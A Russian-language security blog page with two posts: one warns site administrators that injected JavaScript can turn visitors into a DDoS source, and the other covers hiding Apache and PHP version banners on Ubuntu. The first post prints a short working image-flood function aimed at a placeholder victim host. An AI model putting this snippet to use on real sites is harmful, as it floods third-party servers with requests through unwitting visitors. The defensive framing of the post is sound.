Страницы

Показаны сообщения с ярлыком безопасность. Показать все сообщения
Показаны сообщения с ярлыком безопасность. Показать все сообщения

JavaScript & DDos

JavaScript или как за'DDos'ить самого себя.


DDos самого себя, это страшный сон любого администратора. По этому что бы сны были гладкими и мягкими следует проверять скрипты которые внедряются в проект на сайте (сервере).

Наибольшее распространение получил известность встраиваясь в JavaScript-код плеера.

С небольшими изменениями скрипт может также атаковать ресурсы сети без вашего ведома просто подгружаясь в код плеера или просто ваш ресурс взломали и используют по своему назначению.

Сам код прост и не замысловат:

function imgflood() {
  var TARGET = 'victim-website.com'
  var URI = '/index.php?'
  var pic = new Image()
  var rand = Math.floor(Math.random() * 1000)
  pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflood, 10)
 
Также код может быть легко попрятан под Base64 или обфусцирован.

Оригинал этого кода взят здесь - https://blog.cloudflare.com/an-introduction-to-javascript-based-ddos/


Вот так этот код выглядел при внедрении его в объект:







а это результат его работы:

 

оригинал фото взят здесь






=====
~$ Удачи /не-болейте/-и/не-кашляйте

Прячем Версию Веб-сервера Apache, Nginx, PHP в Ubuntu/Debian

Полезная возможность спрятать apache2, nginx  и даже заголовки php с помощью простой настройки чем хоть немного обезопасить свой сервер.
 

Ставим модуль безопасности для apache2:

~$ sudo apt-get install libapache2-mod-security2

Редактируем файл настроек:  
~$ nano /etc/apache2/conf.d/security

Указываем ServerTokens Prod для минимальной информации о сервере.

Если хотим дать свою информацию и следовательно полностью скрыть использование веб-сервера apache2 прописываем или правим:

ServerTokens Full
ServerSignature Off
SecServerSignature «Web server bla-bla-bla» 

~$ sudo a2enmod security
~$ sudo a2enmod headers

~$ sudo /etc/init.d/apache2 restart

Но лучше так:

~$ sudo /etc/init.d/apache2 stop
~$ sudo /etc/init.d/apache2 start

В итоге apache2 информацию о себе давать не будет, даже не будет говорить о том, что он apache2.

======

Прячем PHP: